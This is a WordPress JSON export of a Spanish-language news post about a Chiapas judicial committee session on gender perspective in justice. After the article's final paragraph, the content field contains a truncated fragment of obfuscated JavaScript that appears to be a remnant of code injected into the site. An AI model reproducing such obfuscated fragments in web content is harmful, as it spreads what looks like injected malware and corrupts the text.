{"id":7196,"date":"2022-12-07T04:02:53","date_gmt":"2022-12-07T04:02:53","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7196"},"modified":"2022-12-07T04:02:54","modified_gmt":"2022-12-07T04:02:54","slug":"comprometido-poder-judicial-en-la-imparticion-de-justicia-con-perspectiva-de-genero","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7196","title":{"rendered":"Comprometido Poder Judicial en la impartici\u00f3n de justicia con perspectiva de g\u00e9nero"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221205-WA0038-1024x682.jpg\" alt=\"\" class=\"wp-image-7197\" width=\"840\" height=\"559\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221205-WA0038-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221205-WA0038-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221205-WA0038-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221205-WA0038-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221205-WA0038.jpg 1280w\" sizes=\"auto, (max-width: 840px) 100vw, 840px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221205-WA0027-1024x682.jpg\" alt=\"\" class=\"wp-image-7198\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221205-WA0027-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221205-WA0027-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221205-WA0027-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221205-WA0027-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221205-WA0027.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>05 DICIEMBRE DEL 2022<\/p>\n\n\n\n<p>Tuxtla Guti\u00e9rrez; Chiapas.- El Poder Judicial del Estado, que encabeza el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Guillermo Ramos P\u00e9rez, fue sede de la D\u00e9cima Sexta Sesi\u00f3n Ordinaria del Comit\u00e9 Estatal de Seguimiento y Evaluaci\u00f3n del Convenio de Adhesi\u00f3n al Pacto para Introducir la Perspectiva de G\u00e9nero en los \u00d3rganos de Impartici\u00f3n de Justicia en M\u00e9xico.<\/p>\n\n\n\n<p>Esta Sesi\u00f3n que se realiz\u00f3 en el marco de las actividades en conmemoraci\u00f3n al D\u00eda Internacional de la Lucha Contra la Violencia hacia las Mujeres, fue encabezada por el magistrado presidente Guillermo Ramos P\u00e9rez, quien fue el responsable de realizar el cierre de la misma, donde exhort\u00f3 a las y los representantes de los \u00f3rganos impartidores de justicia en nuestra entidad, a seguir trabajando con ah\u00ednco en este importante tema y a seguir informando puntualmente los avances de estos trabajos.<\/p>\n\n\n\n<p>Por su parte, la consejera de la Judicatura Isela de Jes\u00fas Mart\u00ednez Flores, acompa\u00f1ada de su hom\u00f3loga Mar\u00eda Itzel Ballinas Barbosa, destac\u00f3 que desde la llegada a la presidencia del magistrado Guillermo Ramos, ha enarbolado con decisi\u00f3n la causa de la justicia con perspectiva de g\u00e9nero. As\u00ed mismo reconoci\u00f3 en las y los asistentes, la disposici\u00f3n y ser grandes aliados en el tema que les reuni\u00f3.<\/p>\n\n\n\n<p>La directora de Igualdad de G\u00e9nero y Derechos Humanos y secretaria t\u00e9cnica del Comit\u00e9, Mar\u00eda Silinia Aguilar Avenda\u00f1o, present\u00f3 el orden del d\u00eda, donde se dio lectura al acta y seguimiento de los acuerdos de la minuta de la sesi\u00f3n anterior. Adem\u00e1s, fue la encargada de presentar las acciones realizadas en la materia, en esta casa de la justicia.<\/p>\n\n\n\n<p>De igual manera, como integrantes de este Comit\u00e9, presentaron sus informes de acciones, la magistrada presidenta del Tribunal Administrativo, Susana Sarmiento L\u00f3pez; el magistrado presidente del Tribunal Electoral, Gilberto de Guzm\u00e1n B\u00e1tiz Garc\u00eda; el presidente de la Junta Local de Conciliaci\u00f3n y Arbitraje en el Estado, Carlos Enrique Mart\u00ednez V\u00e1zquez; y de los \u00f3rganos federales: el presidente del Tribunal Federal de Justicia Administrativa, magistrado Alberto Rodr\u00edguez Garc\u00eda y la magistrada del Tribunal Unitario Agrario Distrito 3, Maricela Gerardina Ram\u00edrez Borjon.<\/p>\n\n\n\n<p>Y como invitados del Consejo de la Judicatura, asistieron la titular del Comit\u00e9 de Igualdad y Derechos Humanos del Tribunal Administrativo, magistrada M\u00f3nica de Jes\u00fas Trejo Vel\u00e1zquez y el director de Asuntos Jur\u00eddicos, Luis Alfredo Sierra S\u00e1nchez.&nbsp;<\/p>\n\n\n\n<p>Cabe mencionar que, este Poder Judicial se adicion\u00f3 al Pacto para Introducir la Perspectiva de G\u00e9nero en los \u00d3rganos de Impartici\u00f3n de Justicia en M\u00e9xico, en julio de 2012, con el objetivo de implementar en el estado las disposiciones que se encuentran contenidas en el mismo.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>05 DICIEMBRE DEL 2022 Tuxtla Guti\u00e9rrez; Chiapas.- El Poder Judicial del Estado, que encabeza el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Guillermo Ramos P\u00e9rez, fue sede de la D\u00e9cima Sexta Sesi\u00f3n Ordinaria del Comit\u00e9 Estatal de Seguimiento y Evaluaci\u00f3n del Convenio de Adhesi\u00f3n al Pacto para Introducir la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7197,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20,17,6],"tags":[],"class_list":["post-7196","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-minuto","category-portada","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7196","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7196"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7196\/revisions"}],"predecessor-version":[{"id":7199,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7196\/revisions\/7199"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7197"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7196"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7196"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7196"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}